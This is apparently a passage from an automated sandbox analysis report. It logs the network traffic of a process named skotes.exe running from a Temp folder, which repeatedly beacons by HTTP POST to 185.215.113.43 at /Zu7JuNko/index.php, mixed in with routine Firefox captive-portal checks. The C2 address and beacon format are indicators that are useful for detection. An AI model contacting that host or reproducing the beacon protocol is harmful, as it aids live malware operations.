                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:11.522856951 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:11.617502928 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84228
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:12.033231020 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:12.132852077 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84229
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:15.225713968 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:15.320410013 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84232
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:25.489548922 CET6OUTData Raw: 00
                                                                                                                                                                                                                                                                                      Data Ascii:


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      44192.168.2.650208185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:10.387653112 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:11.085414886 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:10 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      45192.168.2.650212185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:12.717417955 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:13.412437916 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:13 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      46192.168.2.650214185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:15.084294081 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:15.771451950 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:15 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      47192.168.2.650215185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:17.312625885 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:18.023763895 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:17 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      48192.168.2.650222185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:19.799114943 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:20.510217905 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:20 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      49192.168.2.650224185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.419115067 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:23.122659922 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:23 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      50192.168.2.652362185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:25.167011976 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:25.900598049 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:25 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      51192.168.2.652370185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:27.999309063 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:29.699012995 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:29 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      52192.168.2.652375185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:31.759525061 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:32.406136036 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:56:32 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      53192.168.2.65237934.107.221.8280
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:32.937298059 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:33.402775049 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84250
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.033006907 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.135988951 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84251
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.252800941 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.351550102 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                      Date: Tue, 19 Nov 2024 10:32:23 GMT
                                                                                                                                                                                                                                                                                      Age: 84251
                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:34.389678955 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Connection: keep-alive
